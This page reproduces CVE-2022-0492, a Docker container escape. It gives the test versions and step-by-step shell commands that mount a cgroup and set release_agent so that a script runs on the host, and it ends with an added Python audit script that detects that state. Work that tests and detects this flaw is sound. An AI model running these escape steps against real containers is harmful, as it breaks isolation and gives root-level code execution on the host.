Docker >> Container Escape

CVE-2022-0492


References:
1. CVE-2022-0492
2. containerd.io_1.2.13-2_amd64.deb
3. docker-ce_19.03.10~3-0~ubuntu-focal_amd64.deb
4. docker-ce-cli_19.03.10~3-0~ubuntu-focal_amd64.deb

Test environment
Ubuntu 20.04 (5.4.0-21-generic)
Docker version 19.03.10, build 9424aeaee9

Test steps

$ sudo docker run --rm -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu:22.04 /bin/bash
cve:/# unshare -UrmC --propagation=unchanged bash
cve:/# mkdir /tmp/test
cve:/# mount -t cgroup -o rdma cgroup /tmp/test
cve:/# mkdir /tmp/test/x 
cve:/# echo 1 > /tmp/test/x/notify_on_release
cve:/# echo '#!/bin/sh' > /cmd
cve:/# echo "touch /tmp/cve_test" >> /cmd
cve:/# chmod 0777 /cmd
cve:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
cve:/# echo "$host_path/cmd" > /tmp/test/release_agent
cve:/# sh -c "echo \$\$ > /tmp/test/x/cgroup.procs"
cve:/# exit
cve:/# exit

# ls /tmp
    cve_test
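
Host-side check for the state the steps above leave behind, written as an added example (not part of the original page): it walks each cgroup v1 hierarchy and reports any whose release_agent is set, along with the cgroups that have notify_on_release enabled. The function names, the default /sys/fs/cgroup location and the sample tree (including its release_agent path) are assumptions constructed for illustration.

```python
#!/usr/bin/env python3
"""Audit cgroup v1 hierarchies for a configured release_agent (added example)."""
import os
import tempfile


def read(path):
    """Return stripped file contents, or '' if the file is missing/unreadable."""
    try:
        with open(path) as fh:
            return fh.read().strip()
    except OSError:
        return ""


def audit(cgroup_root="/sys/fs/cgroup"):
    """Return [(hierarchy, release_agent, [cgroups with notify_on_release=1])]
    for every hierarchy under cgroup_root whose release_agent is non-empty."""
    findings = []
    if not os.path.isdir(cgroup_root):
        return findings
    for name in sorted(os.listdir(cgroup_root)):
        top = os.path.join(cgroup_root, name)
        if os.path.islink(top):
            continue  # e.g. cpu -> cpu,cpuacct; avoid reporting a hierarchy twice
        agent = read(os.path.join(top, "release_agent"))
        if not agent:
            continue  # no agent configured: an emptied cgroup triggers nothing
        armed = [d for d, _, files in os.walk(top)
                 if "notify_on_release" in files
                 and read(os.path.join(d, "notify_on_release")) == "1"]
        findings.append((name, agent, sorted(armed)))
    return findings


def constructed_sample():
    """Build a fake cgroup tree (constructed data) resembling the post-test state."""
    root = tempfile.mkdtemp()
    for hier, agent, flag in (("rdma", "/var/lib/docker/overlay2/EXAMPLE/diff/cmd", "1"),
                              ("memory", "", "0")):
        child = os.path.join(root, hier, "x")
        os.makedirs(child)
        with open(os.path.join(root, hier, "release_agent"), "w") as fh:
            fh.write(agent + "\n")
        with open(os.path.join(child, "notify_on_release"), "w") as fh:
            fh.write(flag + "\n")
    return root


if __name__ == "__main__":
    for hier, agent, armed in audit():
        print(f"[!] {hier}: release_agent={agent} notify_on_release=1 in {armed}")
```

On a host that does not intentionally use release agents, any line of output deserves investigation, especially an agent path that points into container storage.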

